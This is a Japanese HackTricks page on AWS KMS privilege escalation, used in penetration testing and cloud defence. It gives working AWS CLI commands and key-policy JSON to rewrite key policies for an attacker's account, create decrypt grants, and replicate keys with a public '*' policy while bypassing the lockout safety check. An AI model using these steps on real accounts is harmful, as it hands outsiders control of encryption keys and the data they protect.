AWS - KMS Privesc

htARTE（HackTricks AWS Red Team Expert） を通じて、ゼロからヒーローまでAWSハッキングを学ぶ！

HackTricks をサポートする他の方法:

HackTricks で企業を宣伝したい または HackTricks をPDFでダウンロードしたい 場合は、SUBSCRIPTION PLANS をチェックしてください！
公式PEASS＆HackTricksグッズを入手する
The PEASS Familyを発見し、独占的なNFTsコレクションを見つける
💬 Discordグループ に参加するか、telegramグループに参加するか、Twitter 🐦 @hacktricks_live をフォローする。
ハッキングテクニックを共有するために、PRを HackTricks と HackTricks Cloud のGitHubリポジトリに提出してください。

KMS

KMSに関する詳細情報は次を参照してください:

`kms:ListKeys`,`kms:PutKeyPolicy`, (`kms:ListKeyPolicies`, `kms:GetKeyPolicy`)

これらの権限を持つと、キーへのアクセス権限を変更して、他のアカウントや誰でも使用できるようにすることができます:

aws kms list-keys
aws kms list-key-policies --key-id <id> # Although only 1 max per key
aws kms get-key-policy --key-id <id> --policy-name <policy_name>
# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
aws kms put-key-policy --key-id <id> --policy-name <policy_name> --policy file:///tmp/policy.json

policy.json:

{
"Version" : "2012-10-17",
"Id" : "key-consolepolicy-3",
"Statement" : [
{
"Sid" : "Enable IAM User Permissions",
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<origin_account>:root"
},
"Action" : "kms:*",
"Resource" : "*"
},
{
"Sid" : "Allow all use",
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : [ "kms:*" ],
"Resource" : "*"
}
]
}

`kms:CreateGrant`

これは、プリンシパルがKMSキーを使用することを許可します:

aws kms create-grant \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
--grantee-principal arn:aws:iam::123456789012:user/exampleUser \
--operations Decrypt

許可は特定の種類の操作のみを許可できます：https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations

KMSが生成された許可を使用するユーザーにキーの使用を許可するには数分かかる場合があることに注意してください。その時間が経過すると、プリンシパルは何も指定せずにKMSキーを使用できます。ただし、すぐに許可を使用する必要がある場合は、許可トークンを使用してください（以下のコードを確認してください）。 詳細はこちらを参照してください。

# Use the grant token in a request
aws kms generate-data-key \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
–-key-spec AES_256 \
--grant-tokens $token

注意してください。以下のコマンドでキーの権限をリストアップすることが可能です:

aws kms list-grants --key-id <value>

`kms:CreateKey`, `kms:ReplicateKey`

これらの権限を持っていると、異なるリージョンで異なるポリシーを持つKMSキーを複製することが可能です。

したがって、攻撃者はこれを悪用して、キーへのアクセス権限を昇格させ、それを使用することができます。

aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml

{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "kms:*",
"Resource": "*"
}
]
}

`kms:Decrypt`

この権限は、キーを使用して情報を復号化することを許可します。詳細については、次を確認してください：

pageAWS - KMS Post Exploitation

htARTE（HackTricks AWS Red Team Expert） を通じて、ゼロからヒーローまでAWSハッキングを学ぶ！

HackTricks をサポートする他の方法：

HackTricks で企業を宣伝したい、または HackTricks をPDFでダウンロードしたい場合は、SUBSCRIPTION PLANS をチェックしてください！
公式PEASS＆HackTricksのスウォッグを入手する
The PEASS Familyを発見し、独占的な NFTs のコレクションを見つける
💬 Discord グループ に参加するか、telegram グループ に参加するか、Twitter 🐦 @hacktricks_live をフォローする
HackTricks と HackTricks Cloud の GitHub リポジトリに PR を提出して、あなたのハッキングトリックを共有する

前へAWS - IAM Privesc 次へAWS - Lambda Privesc

最終更新 1 か月前

KMS

kms:ListKeys,kms:PutKeyPolicy, (kms:ListKeyPolicies, kms:GetKeyPolicy)

kms:CreateGrant

kms:CreateKey, kms:ReplicateKey

kms:Decrypt

`kms:ListKeys`,`kms:PutKeyPolicy`, (`kms:ListKeyPolicies`, `kms:GetKeyPolicy`)

`kms:CreateGrant`

`kms:CreateKey`, `kms:ReplicateKey`

`kms:Decrypt`